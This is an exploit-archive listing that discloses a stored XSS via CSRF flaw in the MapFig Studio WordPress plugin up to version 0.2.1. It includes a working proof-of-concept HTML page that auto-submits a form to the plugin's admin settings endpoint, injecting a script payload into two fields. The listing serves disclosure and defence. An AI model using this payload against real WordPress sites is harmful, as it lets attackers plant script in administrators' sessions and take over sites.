Home[1] Files[2] News[3] &[SERVICES_TAB] Contact[4] Add New[5]
- WordPress MapFig Studio 0.2.1 Cross Site Request Forgery / Cross Site Scripting[6]
- Authored by Vuln Seeker Cybersecurity Team[7]
-
WordPress MapFig Studio plugin versions 0.2.1 and below suffer from cross site request forgery and cross site scripting vulnerabilities.
- SHA-256 |
bb373228013ea4da17857eacb046e2ed58e688e52aab0abc39365db5b8ba412c - Download[8] | Favorite[9] | View[10]
Change Mirror[11] Download[12]
# Exploit Title: MapFig Studio <= 0.2.1 - Stored XSS via CSRF
# Date: 15-04-2024
# Exploit Author: Vuln Seeker Cybersecurity Team
# Vendor Homepage: https://wordpress.org/plugins/mapfig-studio/
# Version: <= 0.2.1
# Tested on: Firefox
# Contact me: Cette adresse e-mail est protégée contre les robots spammeurs. Vous devez activer le JavaScript pour la visualiser.
Description
The plugin does not have CSRF check in some places, and is missing
sanitisation as well as escaping, which could allow attackers to make
logged in admin add Stored XSS payloads via a CSRF attack
Proof of Concept
Have a logged in admin open a page containing:
<html>
<body>
<form action="http://example.com/wp-admin/admin.php?page=studio_settings"
method="POST">
<input type="hidden" name="studio_apikey"
value=""><script>alert(1)</script>" />
<input type="hidden" name="studio_url"
value=""><script>alert(1)</script>" />
<input type="hidden" name="save" value="Save!" />
<input type="submit" value="Submit request" />
</form>
<script>
history.pushState('', '', '/');
document.forms[0].submit();
</script>
</body>
</html>
Reference:
https://wpscan.com/vulnerability/0346b62c-a856-4554-a24a-ef2c2943bda9/
File Tags
- ActiveX[18] (933)
- Advisory[19] (86,358)
- Arbitrary[20] (16,873)
- BBS[21] (2,859)
- Bypass[22] (1,861)
- CGI[23] (1,033)
- Code Execution[24] (7,811)
- Conference[25] (691)
- Cracker[26] (844)
- CSRF[27] (3,396)
- DoS[28] (25,074)
- Encryption[29] (2,389)
- Exploit[30] (53,189)
- File Inclusion[31] (4,262)
- File Upload[32] (994)
- Firewall[33] (822)
- Info Disclosure[34] (2,890)
- Intrusion Detection[35] (915)
- Java[36] (3,144)
- JavaScript[37] (896)
- Kernel[38] (7,208)
- Local[39] (14,797)
- Magazine[40] (586)
- Overflow[41] (13,170)
- Perl[42] (1,435)
- PHP[43] (5,225)
- Proof of Concept[44] (2,393)
- Protocol[45] (3,724)
- Python[46] (1,640)
- Remote[47] (31,656)
- Root[48] (3,636)
- Rootkit[49] (527)
- Ruby[50] (632)
- Scanner[51] (1,657)
- Security Tool[52] (8,027)
- Shell[53] (3,274)
- Shellcode[54] (1,217)
- Sniffer[55] (902)
- Spoof[56] (2,276)
- SQL Injection[57] (16,609)
- TCP[58] (2,441)
- Trojan[59] (690)
- UDP[60] (904)
- Virus[61] (669)
- Vulnerability[62] (32,972)
- Web[63] (9,963)
- Whitepaper[64] (3,782)
- x86[65] (967)
- XSS[66] (18,254)
- Other[67]
File Archives
- August 2024[68]
- July 2024[69]
- June 2024[70]
- May 2024[71]
- April 2024[72]
- March 2024[73]
- February 2024[74]
- January 2024[75]
- December 2023[76]
- November 2023[77]
- October 2023[78]
- September 2023[79]
- Older[80]
Systems
- AIX[81] (429)
- Apple[82] (2,099)
- BSD[83] (377)
- CentOS[84] (58)
- Cisco[85] (1,927)
- Debian[86] (7,098)
- Fedora[87] (1,693)
- FreeBSD[88] (1,246)
- Gentoo[89] (4,567)
- HPUX[90] (880)
- iOS[91] (378)
- iPhone[92] (108)
- IRIX[93] (220)
- Juniper[94] (69)
- Linux[95] (50,715)
- Mac OS X[96] (691)
- Mandriva[97] (3,105)
- NetBSD[98] (256)
- OpenBSD[99] (489)
- RedHat[100] (16,486)
- Slackware[101] (941)
- Solaris[102] (1,611)
- SUSE[103] (1,444)
- Ubuntu[104] (9,742)
- UNIX[105] (9,435)
- UnixWare[106] (187)
- Windows[107] (6,672)
- Other[108]
- Services
- Security Services[119]
- Hosting By
- Rokasec[120]


